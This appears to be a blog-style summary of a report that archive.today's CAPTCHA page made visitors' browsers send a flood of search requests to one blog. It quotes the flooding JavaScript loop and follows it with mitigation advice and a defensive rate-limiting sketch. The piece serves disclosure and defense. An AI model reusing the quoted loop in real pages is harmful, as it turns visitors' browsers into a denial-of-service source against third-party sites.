archive.today Is Directing a DDoS Attack Against a Blog
Quick summary: A confirmed client-side script on archive.today’s CAPTCHA page repeatedly requests a blog’s search URL roughly every 300 milliseconds while the CAPTCHA remains open. That pattern produces sustained, DDoS-like traffic directed at the target site.
What was found
Researchers and the blog owner observed a `setInterval` loop that issues `fetch()` requests to a blog’s search endpoint with randomized query strings, preventing caching and keeping requests constant. The code sample (below) was visible in the CAPTCHA page and reproduced in the original report.
```javascript
setInterval(function() {
  fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
    referrerPolicy: "no-referrer",
    mode: "no-cors"
  });
}, 300);
```
Plain English: while the CAPTCHA tab stays open, browsers visiting that page repeatedly make requests to the target blog — about three times per second — which over time can overwhelm small or under-provisioned sites.
Why this matters
This behavior can unintentionally (or intentionally) turn ordinary users into traffic generators — effectively weaponizing visitor browsers and producing sustained load that looks like a distributed denial-of-service attack.
Mitigation steps for site owners
- Implement rate limiting on search and other high-cost endpoints (return 429 when thresholds are exceeded).
- Use CDN or WAF rules to throttle abnormal patterns and block abusive referrers.
- Serve cached lightweight results for obviously random search queries.
- Collect request headers, timestamps, and user agent samples to support abuse reports.
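A sketch of the first and third mitigation steps for the `?s=` search endpoint, as an added example that is not code from the original report. Because the script sets `referrerPolicy: "no-referrer"`, the decision is keyed on client address and request rate rather than on the referrer; `SearchGuard`, `replay`, the thresholds and the `blog.example` base URL are assumptions made for illustration.

```javascript
// Added example. SearchGuard, replay and the thresholds are hypothetical names and values.
// Shape of the script's queries: toString(36).substring(2, 3..10) yields 1-8 chars of [0-9a-z].
// Real searches such as "linux" match too, so the shape is only a hint, never a block rule.
const SCRIPT_QUERY_SHAPE = /^[0-9a-z]{1,8}$/;

class SearchGuard {
  constructor({ windowMs = 10000, maxPerWindow = 5, shapedBeforeCache = 3 } = {}) {
    Object.assign(this, { windowMs, maxPerWindow, shapedBeforeCache });
    this.hits = new Map(); // client key (e.g. IP) -> [{ t, shaped }] inside the window
  }

  // Decide how to answer one request; nowMs is a parameter so the logic is testable.
  decide(clientKey, requestUrl, nowMs) {
    // "https://blog.example" is a placeholder base for parsing relative request URLs.
    const query = new URL(requestUrl, "https://blog.example").searchParams.get("s");
    if (query === null) return { status: 200, action: "pass" }; // not a search request

    const recent = (this.hits.get(clientKey) || []).filter((h) => nowMs - h.t < this.windowMs);
    this.hits.set(clientKey, recent);
    if (recent.length >= this.maxPerWindow) {
      // Rejected requests are not recorded, so per-client state stays bounded.
      const retryAfterSec = Math.ceil((recent[0].t + this.windowMs - nowMs) / 1000);
      return { status: 429, action: "reject", retryAfterSec };
    }
    recent.push({ t: nowMs, shaped: SCRIPT_QUERY_SHAPE.test(query) });

    // Several script-shaped queries in one window: skip the real search, serve a cached page.
    const shapedCount = recent.filter((h) => h.shaped).length;
    const action = shapedCount >= this.shapedBeforeCache ? "serve-cached" : "search";
    return { status: 200, action };
  }
}

// Replay constructed queries from one client at a fixed interval; returns the actions taken.
function replay(guard, clientKey, queries, intervalMs) {
  return queries.map((q, i) =>
    guard.decide(clientKey, "/?s=" + encodeURIComponent(q), i * intervalMs).action);
}

// Constructed sample: one open CAPTCHA tab, one request every 300 ms.
const tabQueries = ["k3", "9xq0a", "zz81", "a", "b7c2d", "q", "m4n", "07yt2x"];
console.log(replay(new SearchGuard(), "198.51.100.7", tabQueries, 300));
```

A long-running deployment would also need to evict map entries for clients that have gone idle, and clients behind a shared address count as one key.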
Read the full report
For complete screenshots, timeline, and the author’s account, see the original investigation: https://gyrovague.com/2026/02/01/archive-today-is-directing-a-ddos-attack-against-my-blog/